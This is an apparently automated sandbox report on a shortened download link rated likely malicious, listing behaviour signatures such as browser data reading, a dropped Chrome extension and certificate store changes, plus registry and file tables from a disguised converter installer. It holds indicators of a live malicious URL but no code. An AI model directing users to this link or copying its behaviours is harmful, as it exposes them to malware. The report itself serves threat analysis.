Analysis Overview
Threat Level: Likely malicious
The file https://ify.ac/1Ic5 was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Checks BIOS information in registry
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Drops Chrome extension
Enumerates connected drives
Checks installed software on the system
Drops desktop.ini file(s)
Drops file in System32 directory
Drops file in Windows directory
Checks CPU configuration
Changes its process name
Reads CPU attributes
Drops file in Program Files directory
Writes file to tmp directory
Enumerates physical storage devices
Enumerates kernel/hardware configuration
Reads runtime system information
Program crash
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
NTFS ADS
Modifies Internet Explorer settings
Uses Volume Shadow Copy WMI provider
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry class
Modifies system certificate store
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Volume Shadow Copy service COM API
Suspicious behavior: MapViewOfSection
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-14 17:56
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-14 17:56
Reported
2024-07-14 18:01
Platform
win10-20240404-en
Max time kernel
299s
Max time network
303s
Command Line
Signatures
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp | N/A |
Checks installed software on the system
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File opened for modification | C:\Windows\Debug\ESE.TXT | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Program crash
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "140" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\MrtCache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{636B1326-B3B1-4FBB-A942-7AA4E1634C21} = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 18bef62517d6da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = c0f7bb3a17d6da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\google.com\NumberOfSubdoma = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\ify.ac\ = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 20792d0d25dada01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\PersistedStorageItemTable\System\{3A6B00F0-A754-4E7E-933B-1DEAFF04BC1 | C:\Windows\system32\browser_broker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "533" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\ = "90" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\ = "105" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\ = "62" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "532" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "531" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "562" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\google.com\ = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\google.com\Total = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "1020" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 870abc3a17d6da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1514" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "9" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\setup_woMGQPOBj7.zip.i2yvpnb.partial:Zone.Identifier | C:\Windows\system32\browser_broker.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6SDC9.tmp\setup_woMGQPOBj7.tmp | N/A |
